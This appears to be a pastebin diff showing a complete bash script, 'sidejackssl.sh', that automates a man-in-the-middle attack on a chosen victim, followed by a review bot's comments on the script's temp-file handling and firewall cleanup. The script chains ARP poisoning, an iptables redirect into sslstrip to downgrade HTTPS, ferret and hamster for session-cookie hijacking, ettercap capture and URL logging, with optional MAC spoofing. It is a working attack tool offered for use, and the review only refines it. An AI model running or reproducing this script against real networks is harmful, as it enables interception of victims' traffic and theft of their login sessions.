View difference between Paste ID: SjHm7quG and
1 | - | |
1 | + | #!/bin/bash |
2 | ||
3 | # sidejackssl.sh v0.1 | |
4 | # tested in backtrack 4 R2 environment, run as root. | |
5 | # xterm used for window control | |
6 | # arpspoof poisons a single victim and gateway | |
7 | # ferret and hamster for sidejacking | |
8 | # sslstrip for https | |
9 | # ettercap for everything else | |
10 | # urlsnarf to monitor visited urls | |
11 | # firefox needs to be configured with a proxy of 127.0.0.1:1234 | |
12 | # url for hamster server is http://hamster | |
13 | # by gorara | |
14 | ||
15 | # a few variables (do not change) | |
16 | m1="0" # missing file var m1 | |
17 | m2="0" # missing file var m2 | |
18 | m3="0" # missing file var m3 | |
19 | m4="0" # missing file var m4 | |
20 | quickclean="0" # used for quick clean up | |
21 | randmac="n" # default setting do not randomize MAC | |
22 | hamsterfile="hamster.txt" # hamster output file (you can't change it) | |
23 | trap 'cleanup' SIGINT SIGTERM # detect control-c | |
24 | ||
25 | # a few more variables (change these if required) | |
26 | ||
27 | # xterm window variables | |
28 | x="0" # x offset value | |
29 | y="0" # y offset value | |
30 | width="120" # width value | |
31 | height="7" # height value | |
32 | yoffset="120" # y offset | |
33 | fgcolor="white" # foreground color | |
34 | bgcolor="black" # background color | |
35 | ||
36 | # style variables | |
37 | warnstyle="[\e[01;38mw\e[00m]" # warning msgs style | |
38 | execstyle="[\e[01;32mx\e[00m]" # execute msgs style | |
39 | infostyle="[\e[01;34mi\e[00m]" # informational msgs style | |
40 | inputstyle="[\e[01;30m?\e[00m]" # input msgs style | |
41 | ||
42 | # file variables | |
43 | sslstripfile="sslstrip.log" # sslstrip output file name | |
44 | snifffile="sniff-*" # hamster sniff file wildcard | |
45 | etterfile="etter.cap" # ettercap output cap file | |
46 | temp="/tmp" # temporary dir | |
47 | ||
48 | function usage | |
49 | { | |
50 | clear | |
51 | echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]" | |
52 | echo "" | |
53 | echo " -i interface interface to use, ex. eth0, wlan0." | |
54 | echo " -t target the target IP address." | |
55 | echo " -g gateway the gateway IP address." | |
56 | echo " -r randomize your MAC address," | |
57 | echo " only use for wired interfaces." | |
58 | echo " -h display this help screen." | |
59 | echo "" | |
60 | echo " examples: " | |
61 | echo " bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r" | |
62 | echo " bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254" | |
63 | echo "" | |
64 | exit 0 | |
65 | } | |
66 | ||
67 | function cleanup() { | |
68 | echo -e "\n$warnstyle control-c pressed! " | |
69 | ||
70 | # exit script if nothing has been modified | |
71 | if [[ "$quickclean" = "1" ]]; then | |
72 | echo -e "$infostyle nothing changed, all done!" | |
73 | exit 0 | |
74 | fi | |
75 | ||
76 | echo -e "$infostyle cleaning up..." | |
77 | echo -e "$execstyle flushing iptables..." | |
78 | iptables -F | |
79 | iptables -t nat -F | |
80 | ||
81 | echo -e "$execstyle turning off IP forwarding..." | |
82 | echo "0" > /proc/sys/net/ipv4/ip_forward | |
83 | ||
84 | # change back MAC address to orignal one | |
85 | if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then | |
86 | echo -e "$execstyle resetting MAC address..."; | |
87 | echo -e "$infostyle original MAC is: $origmac" | |
88 | ifconfig $interface down | |
89 | ifconfig $interface hw ether $origmac | |
90 | ifconfig $interface up | |
91 | if [ -z $gw ]; then | |
92 | echo -e "$warnstyle WARNING, you have no default gateway!" | |
93 | else | |
94 | route add default gw $gw | |
95 | fi | |
96 | rm $temp/mac.orig | |
97 | rm $temp/gw.orig | |
98 | fi | |
99 | ||
100 | echo -e "$execstyle cleaning up files..." | |
101 | echo -e "$infostyle temp directory: " | |
102 | ||
103 | # testing to see if files exist, if so display them... | |
104 | if [ -f $temp/$sslstripfile ]; then | |
105 | ls $temp/$sslstripfile | |
106 | else | |
107 | #echo -e "$warnstyle missing $sslstripfile" | |
108 | m1="1" | |
109 | fi | |
110 | ||
111 | if [ -f $temp/$etterfile ]; then | |
112 | ls $temp/$etterfile | |
113 | else | |
114 | #echo -e "$warnstyle missing $etterfile" | |
115 | m2="1" | |
116 | fi | |
117 | ||
118 | echo -e "$infostyle current directory: " | |
119 | ||
120 | if [ -f $snifffile ]; then | |
121 | ls $snifffile | |
122 | else | |
123 | #echo -e "$warnstyle missing $snifffile" | |
124 | m3="1" | |
125 | fi | |
126 | ||
127 | if [ -f $hamsterfile ]; then | |
128 | ls $hamsterfile | |
129 | else | |
130 | #echo -e "$warnstyle missing $hamsterfile" | |
131 | m4="1" | |
132 | fi | |
133 | ||
134 | # testing to see if there are any files at all | |
135 | if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then | |
136 | ||
137 | while [[ "$delete" != "y" || "$delete" != "n" ]] | |
138 | ||
139 | echo -en "$infostyle delete file(s)? [y/n]: " | |
140 | read delete | |
141 | ||
142 | do | |
143 | case "$delete" in | |
144 | y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;; | |
145 | n) echo -e "$warnstyle nothing deleted!"; break;; | |
146 | *) echo -e "$warnstyle wrong selection!"; | |
147 | esac | |
148 | done | |
149 | ||
150 | # delete files as requested | |
151 | if [[ "$delete_marker" = "y" ]]; then | |
152 | if [ -f $temp/$sslstripfile ]; then | |
153 | rm $temp/$sslstripfile | |
154 | fi | |
155 | ||
156 | if [ -f $temp/$etterfile ]; then | |
157 | rm $temp/$etterfile | |
158 | fi | |
159 | ||
160 | if [ -f $snifffile ]; then | |
161 | rm $snifffile | |
162 | fi | |
163 | ||
164 | if [ -f $hamsterfile ]; then | |
165 | rm $hamsterfile | |
166 | fi | |
167 | fi | |
168 | ||
169 | else | |
170 | ||
171 | echo -e "$warnstyle nothing to delete!" | |
172 | fi | |
173 | ||
174 | echo -e "$infostyle all done!" | |
175 | exit 0 | |
176 | } | |
177 | ||
178 | ||
179 | # start main program | |
180 | if [ "$#" -eq 0 ]; then | |
181 | usage | |
182 | fi | |
183 | ||
184 | while [ "$#" -gt 0 ] | |
185 | do | |
186 | case "$1" in | |
187 | -i) interface=$2; shift 1;; | |
188 | -r) randmac="y"; shift 1;; | |
189 | -t) target=$2; shift 1;; | |
190 | -g) gateway=$2; shift 1;; | |
191 | -h) usage;; | |
192 | -*) usage; break;; | |
193 | *) break;; | |
194 | esac | |
195 | shift | |
196 | done | |
197 | ||
198 | # required parameters | |
199 | if [[ -z $interface || -z $target || -z $gateway ]]; then | |
200 | usage | |
201 | exit 0 | |
202 | fi | |
203 | ||
204 | clear | |
205 | ||
206 | if [[ "$randmac" = "y" ]]; then | |
207 | mac="yes" | |
208 | else | |
209 | mac="no" | |
210 | fi | |
211 | ||
212 | # set quick cleanup flag | |
213 | quickclean="1" | |
214 | ||
215 | echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara" | |
216 | echo -e "$infostyle ctrl-c to abort at any time." | |
217 | echo -e "$infostyle attack summary:" | |
218 | echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac" | |
219 | ||
220 | if [[ "$randmac" = "y" ]]; then | |
221 | ||
222 | echo -e "$execstyle change of $interface MAC address requested." | |
223 | ||
224 | if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then | |
225 | echo -e "$infostyle wireless device detected..." | |
226 | echo -e "$warnstyle can't change MAC address without taking wifi interface down" | |
227 | echo -e "$warnstyle do it manually before connecting to the AP." | |
228 | exit 0 | |
229 | fi | |
230 | ||
231 | if [[ "$interface" = eth* ]]; then | |
232 | echo -e "$infostyle wired device detected..." | |
233 | echo -e "$warnstyle WARNING, this will take your wired interface down temporarily." | |
234 | echo -en "$inputstyle do you want to continue? [y/n]: " | |
235 | read continue | |
236 | if [[ "$continue" = "y" ]]; then | |
237 | echo -e "$infostyle proceeding..." | |
238 | else | |
239 | echo -e "$infostyle exiting..." | |
240 | exit 0 | |
241 | fi | |
242 | fi | |
243 | ||
244 | origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}` | |
245 | ||
246 | fi | |
247 | ||
248 | # before this, ctrl-c will exit script without doing anything. | |
249 | quickclean="0" | |
250 | ||
251 | # use macchanger to randomize MAC address, ect. | |
252 | if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then | |
253 | echo -e "$execstyle randomizing MAC address..."; | |
254 | gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig | |
255 | ifconfig $interface down | |
256 | macchanger -r $interface > $temp/mac.orig | |
257 | ifconfig $interface up | |
258 | if [ -z $gw ]; then | |
259 | echo -e "$warnstyle WARNING, you have no default gateway!" | |
260 | else | |
261 | route add default gw $gw | |
262 | fi | |
263 | origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}` | |
264 | fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}` | |
265 | echo -e "$infostyle original MAC is: $origmac" | |
266 | echo -e "$infostyle faked MAC is: $fakemac" | |
267 | fi | |
268 | ||
269 | echo -e "$execstyle turning on IP Forwarding..." | |
270 | echo "1" > /proc/sys/net/ipv4/ip_forward | |
271 | ||
272 | echo -e "$execstyle configuring iptables..." | |
273 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 | |
274 | sleep 1 | |
275 | ||
276 | echo -e "$execstyle starting hamster ... <logging to: $hamsterfile>" | |
277 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster & | |
278 | sleep 2 | |
279 | ||
280 | echo -e "$execstyle starting ferret ... <logging to: console>" | |
281 | y=$(($y+$yoffset)) | |
282 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface & | |
283 | sleep 2 | |
284 | ||
285 | echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>" | |
286 | y=$(($y+$yoffset)) | |
287 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile & | |
288 | sleep 2 | |
289 | ||
290 | echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>" | |
291 | y=$(($y+$yoffset)) | |
292 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ & | |
293 | sleep 2 | |
294 | ||
295 | echo -e "$execstyle starting urlsnarf ... <logging to: console>" | |
296 | y=$(($y+$yoffset)) | |
297 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface & | |
298 | sleep 2 | |
299 | ||
300 | echo -e "$infostyle trap is ready, now to direct traffic..." | |
301 | ||
302 | echo -e "$execstyle ARP poisoning the target..." | |
303 | y=$(($y+$yoffset)) | |
304 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway & | |
305 | sleep 1 | |
306 | ||
307 | echo -e "$infostyle run firefox and type http://hamster" | |
308 | echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234" | |
309 | echo -e "$infostyle press ctrl-c to exit and clean up... \n" | |
310 | for ((;;)) do | |
311 | read loop | |
312 | echo -en "$infostyle press ctrl-c to terminate!" | |
313 | done | |
314 | ||
315 | exit 0 |
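Review bot: The capture and state files are written by a script that its own header says runs as root, to fixed names directly under `/tmp` (`temp="/tmp"` with `sslstrip.log`, `etter.cap`, `mac.orig`, `gw.orig`). Another local user may be able to pre-create or symlink those paths, and the logs, which hold intercepted traffic, get whatever permissions the current umask allows. A private directory avoids both: `umask 077` followed by `temp=$(mktemp -d) || exit 1`. Separately, `cleanup` runs `iptables -F` and `iptables -t nat -F`, which removes every rule on the host rather than the single PREROUTING REDIRECT rule the script added, and it writes `0` to `/proc/sys/net/ipv4/ip_forward` regardless of the earlier value; deleting only the added rule with the matching `-D` form and restoring a saved ip_forward value would leave the machine's own firewall state intact. The `> $temp/gw.orig` on the `gw=` assignment also only creates an empty file, because the command substitution captures the output and the assignment itself writes nothing.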